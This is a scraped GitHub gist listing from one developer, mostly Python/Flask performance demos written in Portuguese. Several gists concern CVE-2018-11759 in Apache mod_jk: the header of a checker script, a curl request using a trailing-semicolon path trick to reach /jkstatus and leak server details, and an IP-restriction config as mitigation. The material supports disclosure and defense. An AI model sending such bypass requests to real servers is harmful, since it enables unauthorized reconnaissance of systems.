Skip to content

Instantly share code, notes, and snippets.

View Jul10l1r4's full-sized avatar
⚠️
Segmentation fault

Julio Lira Jul10l1r4

⚠️
Segmentation fault
86 followers · 38 following
View GitHub Profile
@Jul10l1r4
Jul10l1r4 / Requisicao-sem-threads.py
Last active January 2, 2019 00:17
Esse é um exemplo que faz requisição do blob de três imagens comprimidas em base64 no banco dos EUA em mongoDB
#!/usr/bin/python3
# -*- Coding: utf-8 -*-
from flask import Flask, jsonify
from pymongo import MongoClient
import os
app = Flask(__name__)
# Conectio my
client = MongoClient('mongodb://example:senha@host.com/images',45704)
@Jul10l1r4
Jul10l1r4 / Requisicao-usando-threads.py
Last active January 2, 2019 15:41
Esse exemplo é uma mini API em flask que faz requisição ao banco nos EUA e entrega o blob de três imagens em base64.
#!/usr/bin/python3
# -*- Coding: utf-8 -*-
from multiprocessing.dummy import Pool as ThreadPool
from flask import Flask, jsonify
from pymongo import MongoClient
import os
app = Flask(__name__)
# Conectio my
@Jul10l1r4
Jul10l1r4 / Executando-teste-threads.sh
Created December 31, 2018 20:47
Código para executar testes cli de performance.
wget \
https://gist.githubusercontent.com/Jul10l1r4/27b2b4c8ab4005e480514419bc949f5e/raw/9a9a08f378170736a09c2bce6906d8abdc14084c/urllib-with-threads.py \
https://gist.githubusercontent.com/Jul10l1r4/1fd4ad230f82ce4c28a493ee5c72dbb9/raw/99b7fd818b1574ff278c225baa0b46583f915441/requests.py
@Jul10l1r4
Jul10l1r4 / urllib-with-threads.py
Last active December 31, 2018 19:25
Usando linhas de execução para realizar requisições de forma veloz.
import urllib2
from multiprocessing.dummy import Pool as ThreadPool
import time
# Urls a ser percorrido
urls = [
'https://www.google.com',
'http://www.python.org/about/',
'https://jul10l1r4.github.io',
'https://facebook.com',
'https://twitter.com',
@Jul10l1r4
Jul10l1r4 / requests.py
Last active December 31, 2018 19:04
Cria varias requisições, sem definir temo, e bloqueante
import urllib2
import time
# lista a ser percorrida
urls = [
'https://www.google.com',
'http://www.python.org/about/',
'https://jul10l1r4.github.io',
'https://facebook.com',
'https://twitter.com',
'https://youtube.com',
@Jul10l1r4
Jul10l1r4 / bestCompilation.c
Created December 23, 2018 01:48
Esse é um código de exemplo
void main ()
{
register char *text = "i'm speed\n";
write(0,text,10);
}
@Jul10l1r4
Jul10l1r4 / mod_jk-CVE-2018-11759.sh
Last active December 23, 2018 03:54
This script are a exploit for exploting the applications vulnerables at CVE 2018-11759.
#!/usr/bin/env bash
# CVE 2018-11759
# Author: Julio Lira <jul10l1r4@ufrn.edu.br>
# Colaborator: Fernando Eloi <edxeloi@hotmail.com>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
# Google Dork: ["JK Status Manager for"]
# Vendor Homepage: [http://tomcat.apache.org/]
@Jul10l1r4
Jul10l1r4 / exploit.php
Last active December 13, 2018 04:58
<?php
echo "testetetetetetetetetetetetetetetetetevv";
?>
@Jul10l1r4
Jul10l1r4 / Configuração do apache
Created December 6, 2018 04:19
<Location "/jkstatus">
...
Require ip informa_os_ips
</Location>
@Jul10l1r4
Jul10l1r4 / Requisição intencionalmente tendenciosa afim de colher informações
Created December 6, 2018 04:17
curl "http://localhost/jkstatus;"
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>JK Status Manager</title></head>
<body>
<h1>JK Status Manager for localhost:8080</h1>
<table><tr><td>Server Version:</td><td>Apache/2.4.6 (CentOS) mod_jk/1.2.44</td><td>&nbsp;&nbsp;&nbsp;</td><td>Server Time:</td><td>2018-11-01 09:05:49 +0000</td></tr>
<tr><td>JK Version:</td><td>mod_jk/1.2.44</td><td></td><td>Unix Seconds:</td><td>1541063149</td></tr></table>